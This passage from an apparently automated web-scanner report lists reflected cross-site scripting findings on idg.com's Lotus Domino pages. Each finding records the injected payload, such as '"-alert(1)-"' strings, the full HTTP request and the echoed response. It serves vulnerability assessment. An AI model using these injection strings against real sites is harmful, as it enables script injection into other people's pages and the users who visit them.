<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/swfobject.js?a0de4"-alert(1)-"fcc60ddb84=1");
} catch(err) {}</script>
...[SNIP]...

2.230. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d84b"%3bec78c03d4d3 was submitted in the REST URL parameter 1. This input was echoed as 2d84b";ec78c03d4d3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www2d84b"%3bec78c03d4d3/homenew.nsf/tabs.css HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www2d84b";ec78c03d4d3/homenew.nsf/tabs.css");
} catch(err) {}</script>
...[SNIP]...

2.231. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cb7c"%3b884c5baffb3 was submitted in the REST URL parameter 3. This input was echoed as 6cb7c";884c5baffb3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/tabs.css6cb7c"%3b884c5baffb3 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5012
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css6cb7c";884c5baffb3");
} catch(err) {}</script>
...[SNIP]...

2.232. http://idg.com/www/homenew.nsf/tabs.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/tabs.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a98c2"-alert(1)-"0fa26d0ed6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5025
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/tabs.css?a98c2"-alert(1)-"0fa26d0ed6d=1");
} catch(err) {}</script>
...[SNIP]...

2.233. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11302"%3b713a0a694b9 was submitted in the REST URL parameter 1. This input was echoed as 11302";713a0a694b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www11302"%3b713a0a694b9/idgproducts.nsf/2010mklanding.html HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www11302";713a0a694b9/idgproducts.nsf/2010mklanding.html");
} catch(err) {}</script>
...[SNIP]...

2.234. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b5e4"%3bdd15fff9613 was submitted in the REST URL parameter 3. This input was echoed as 3b5e4";dd15fff9613 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/2010mklanding.html3b5e4"%3bdd15fff9613 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:03 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html3b5e4";dd15fff9613");
} catch(err) {}</script>
...[SNIP]...

2.235. http://idg.com/www/idgproducts.nsf/2010mklanding.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/2010mklanding.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a606"-alert(1)-"6588e540550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:02 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5039
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/2010mklanding.html?2a606"-alert(1)-"6588e540550=1");
} catch(err) {}</script>
...[SNIP]...

2.236. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69e6d"%3b73cbff7633e was submitted in the REST URL parameter 1. This input was echoed as 69e6d";73cbff7633e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www69e6d"%3b73cbff7633e/idgproducts.nsf/countries HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www69e6d";73cbff7633e/idgproducts.nsf/countries");
} catch(err) {}</script>
...[SNIP]...

2.237. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d857"%3b7485e1d876f was submitted in the REST URL parameter 3. This input was echoed as 5d857";7485e1d876f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries5d857"%3b7485e1d876f HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries5d857";7485e1d876f");
} catch(err) {}</script>
...[SNIP]...

2.238. http://idg.com/www/idgproducts.nsf/countries [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d3b0"-alert(1)-"3350bf4334c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:08 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?3d3b0"-alert(1)-"3350bf4334c=1");
} catch(err) {}</script>
...[SNIP]...

2.239. http://idg.com/www/idgproducts.nsf/countries [openview parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/countries

Issue detail

The value of the openview request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4603a"-alert(1)-"811e7d0ebea was submitted in the openview parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5036
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/countries?openview4603a"-alert(1)-"811e7d0ebea");
} catch(err) {}</script>
...[SNIP]...

2.240. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9721d"%3b2db346ab689 was submitted in the REST URL parameter 1. This input was echoed as 9721d";2db346ab689 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www9721d"%3b2db346ab689/idgproducts.nsf/productfinder HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www9721d";2db346ab689/idgproducts.nsf/productfinder");
} catch(err) {}</script>
...[SNIP]...

2.241. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d4b"%3b50ad274776d was submitted in the REST URL parameter 3. This input was echoed as 75d4b";50ad274776d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder75d4b"%3b50ad274776d HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:57 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5021
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder75d4b";50ad274776d");
} catch(err) {}</script>
...[SNIP]...

2.242. http://idg.com/www/idgproducts.nsf/productfinder [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de78f"-alert(1)-"626e657ea96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:56 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5034
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?de78f"-alert(1)-"626e657ea96=1");
} catch(err) {}</script>
...[SNIP]...

2.243. http://idg.com/www/idgproducts.nsf/productfinder [readform parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/idgproducts.nsf/productfinder

Issue detail

The value of the readform request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 977b5"-alert(1)-"03a962af87d was submitted in the readform parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:59 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/idgproducts.nsf/productfinder?readform977b5"-alert(1)-"03a962af87d");
} catch(err) {}</script>
...[SNIP]...

2.244. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b36f5"%3b3f4328df7 was submitted in the REST URL parameter 1. This input was echoed as b36f5";3f4328df7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwb36f5"%3b3f4328df7/idgproducts.nsf/typeform HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:58 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwb36f5";3f4328df7/idgproducts.nsf/typeform");
} catch(err) {}</script>
...[SNIP]...

2.245. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/idgproducts.nsf/typeform

Issue detail

